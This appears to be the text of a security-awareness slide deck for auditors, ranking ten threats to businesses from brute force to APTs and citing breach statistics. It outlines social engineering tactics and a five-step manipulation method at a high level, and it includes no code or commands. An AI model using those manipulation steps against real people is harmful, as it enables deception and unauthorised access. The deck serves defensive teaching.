Date post: | 14-Apr-2017 |
Category: |
Business |
Upload: | auditconferenceseurope |
View: | 388 times |
Download: | 0 times |
CHAT UP LINE #103
As of April 2015, there were over 8 million web
pages offering some sort of free down-loadable
hacking software
Pre-Packaged Hacking
Point & click easy
REPORTS VARY
• 42% increase in targeted attacks in 2014.
• 31% of all targeted attacks aimed at businesses with less than 250
employees.
• 1 waterhole attack infected 500 organizations in a single day.
• 74 zero-day vulnerabilities.
• 32% of all mobile threats steal information.
• 1 threat infected 600,000 Macs in 2014.
• Spam volume continued to decrease, with 69% of all email being
spam.
• The number of phishing sites spoofing social networking sites
increased 125%.
• Web-based attacks increased 30%.
• 5,291 new vulnerabilities discovered in 2014, 415 on mobile O/S.
Symantec Global Intelligence Report 2015
10: BRUTE FORCE
• DDoS
• Drop servers to default
• Use default password
• Take admin rights
• Password crackers
9: IP EQUIPMENT
• Copiers
• Faxes
• Scanners
• Telephones
• UPS
• Air Conditioning
• Fire alarms
• PABX
• Coffee machines
8: MODEMS
• “Phreaking” still works!
• Every server has a modem port!
• 23% of all external attacks are traced
back to previously unidentified
modems
• For every 1000 lines = average of 50
undetected/unprotected modems/ports
MODEMS…
1. Bandwidth Manager
2. Exterior Router
3. Bastion Host (Firewall)
4. Interior Router
5. Network Switch
6. Application Servers
7. Network Storage
8. PBX
9. Voicemail
10.Modem Bank
11.RAS Server
12.Authentication Server
13.UPS
14.Air Conditioning
15.Building Access Control
System
7: MALWARE
• Can retrieve whatever they are programmed to find such as: files, folders, address books, log on IDs, passwords…
• Can execute whatever functions it’s programmed to execute: connections, downloads, off/on, find folder: encrypt, copy, delete, save as….
• Only limited to the creativity of the writer.
DEPLOYING SPYWARE
• Key stroke loggers
• Browser trackers
• Mouse trackers
• Address book grabbers
• Password grabbers
• Session hijackers
• OS/application scouts
• Stealth installs
• Desktop hijacks
6: APPLICATION HACKS
Website attacks that enable
access to the backend:
– SQL injection
– Cross site scripting
– Session hi-jacking
Web Cam Hacking
Simple script allows you to obtain:
• All information about the cam user (name,
picture, location, followers, etc.)
• All devices and operating systems used by
the cam user
• All applications and social networks used by
the cam
• All cam log on and password credentials (i.e.
Skype)
• Cam geo-location
• Live cam feeds
• Cam indicator light control
iPhone Camera Hacking
• Malware
• Stealth installs
• Data interception
• Direct attack
• Call hi-jacking
• VPN hi-jacking
• Session hi-jacking
• Device hi-jacking
5: MOBILE DEVICES
4: SOCIAL ENGINEERING
Accessing a system through a user
1. Identify the target
2. Conduct your research
3. Develop a rapport & trust
4. Exploit the trust for information
5. Use to access the system.
TOOLS
• Personal information about you
• Appeal to vanity
• Appeal to authority
• Appeal to human kindness
• Emotional manipulation
• Capitalize on stupidity
• Capitalize on trust
• Eavesdropping
• Chutzpah!
IN PERSON
Posing: Posing is when a hacker disguises himself as
someone in authority to get physical access to your systems.
Baiting. Baiting is when a hacker leaves a malware-infected
physical device, such as a USB flash drive or CD-ROM, in a
place it is sure to be found like a parking lot, reception area
or toilet.
Tailgating. Tailgating is when a hacker follows an authorised
employee into an otherwise secure office location to access
the IT systems in order to execute an attack.
Dumpster diving. Dumpster diving is just what it says on
the tin
BY TELEPHONE
Pretexting. Pretexting is when a hacker calls
and pretends that they are someone in authority
and requests something from you. Its like
posing only over a telephone.
Quid pro quo. A quid pro quo is when a hacker
requests something from you in exchange for
something desirable.
BY EMAIL
Phishing. Phishing is when a hacker sends
a fraudulent email disguised as a legitimate
email claiming to be from a trusted source.
Spear Phishing: Spear phishing is when a
hacker sends you a fraudulent email from a
trusted source that you have a specific
personal or professional relationship with,
such as your bank, your supermarket,
professional or social media connexions.
Watering hole: A hacker will inject malware
into a legitimate website that companies in
the target industry are already likely to visit.
3: INSIDERS
The overwhelming majority of SME security incidents this year were originated by “insiders”
• IP Theft, Financial Fraud, Procurement Fraud, Insider Trading, Unauthorised applications
• Unauthorised output devices
• Unauthorised connections
• Unauthorised behaviour
• Removable media
CHAT UP LINE #24
“7 out of 10 persons arrested for cyber crime are
employees of the company prosecuting them”
Federal Bureau of Investigation 2010
Company
Supplier 1
Supplier 2
Supplier 3
Supplier 4
Supplier 5
Supplier 6
Supplier 7
Supplier 8
Supplier 9
Hacker
2: 3RD PARTY SUPPLIERS
CHAT UP LINE # 13
“Over 75% of reported breaches over the last 18
months were sourced to a trusted connection”. Wired Jan 2015
1: APT'S
Highly targeted and
sophisticated attacks of duration
utilizing 0-day vulnerabilities to
circumvent traditional security
defences to compromise a
specific target.
CHARACTERISTICS
• Long term process
• Stealthy & complex delivery
• Utilizing multi ingress/egress vectors
• Insider knowledge (process/product)
• Exploits unrecognized vulnerabilities
• Specific target objective: Retrieve/Take down
• Installs it own back door
• High success rate
1. APTs
2. 3rd Party Suppliers
3. Insiders
4. Social Engineering
5. Mobile Devices
6. Web Applications
7. Malware
8. Modems
9. IP Equipment
10. Brute Force
1. Hacktivists Disruption
2. Hackers Data Theft
3. Cyber Criminals Fraud
4. Nation States IP Theft, Disruption
5. Insiders Fraud, IP Theft
CURRENT PERCEPTION
PRIORITY SHOULD BE
1. Insiders Fraud, IP Theft
2. Cyber Criminals Fraud
3. Nation States IP Theft
4. Hackers Data Theft
5. Hacktivists Disruption
THINK LIKE A HACKER
1. If Dr. Evil can run his programs on your network, it’s not your network anymore.
2. If Dr. Evil can upload programs to your website, it’s not your website anymore.
3. If Dr. Evil can access data on your network, it’s not your data any more.
4. If Dr. Evil can make changes to the applications or devices on your network, its not your network or devices any more.
5. If Dr. Evil uses your network to launch an attack on another network, its your problem.
UNDERSTAND EVIL
6. If Dr. Evil can use your network to access your partners network, its your problem.
7. If Dr. Evil can access your stored data, it’s not your data anymore.
8. More often than not, Dr. Evil works for you.
9. Dr. Evil knows where you hide your spare keys.
10. Mini-me is always faster and smarter.